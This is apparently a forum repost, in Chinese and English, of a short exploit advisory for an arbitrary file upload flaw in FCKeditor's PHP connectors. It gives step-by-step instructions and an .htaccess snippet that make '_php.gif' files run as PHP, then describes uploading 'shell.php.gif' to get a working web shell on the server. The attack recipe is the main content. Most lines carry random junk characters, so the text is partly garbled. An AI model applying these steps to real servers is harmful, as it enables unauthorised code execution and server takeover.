FCKeditor所有php版本Upload上传漏洞. k9 X. `$ i T7 i( c
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07" ^/ N, Q8 i+ d# ^+ G1 Z: q( U
减小字体 增大字体
6 j. l5 Y- X6 T: |" J' l) r5 G[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
: y1 @. L; R( e5 w[+] Date: 2011
3 O7 f& S- R6 Y, H, n[+] Author : sinesafe.cn8 k5 p* r& z# G1 h6 H) R1 N) M( A
[+] Website : WwW.sinesafe.cn
$ y, L6 R# }5 o- K3 l" N———————————————————) |% L& E( O4 h, C- F. n) ]
1.create a htaccess file:: d+ ]( v/ \) I8 K
code:* l$ N% j n- M4 b1 p$ M
<FilesMatch “_php.gif”>5 L# e5 }$ ?0 C
SetHandler application/x-httpd-php6 w, D8 |% J5 O3 d) Y8 ?
</FilesMatch>
9 f. x6 q9 r7 U5 A8 ~' E i
) a. a9 d) N8 W7 B2.Now upload this htaccess with FCKeditor.1 q4 c/ y$ x' z
! L' f) j; {' Z4 A9 u
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
+ h) W8 j( T" b% r/ O( n/ c. |, F y! n; R% {. ?6 [
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html* p4 I0 E! q3 y" \7 V4 s
0 X1 j2 I0 b+ g% L3 \0 g( \
———————————————————————————————-7 F& {$ C0 N4 n9 }6 Z6 m
3.Now upload shell.php.gif with FCKeditor.
3 |8 M% t, P9 k5 T3 L5 Z" C4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.$ k' \( S9 _. v7 N' m! i$ F
5.http://www.sinesafe.cn/anything/shell_php.gif
( v' v4 e+ k1 P Y9 F1 Z! A6.Now shell is available from server. |
: P' K4 o3 W1 c, u8 @$ E0 K+ i- f+ I7 y3 {- y
! H* g% d$ Z. f J
|
发表于 2013-10-27 17:25:21
收藏
支持
反对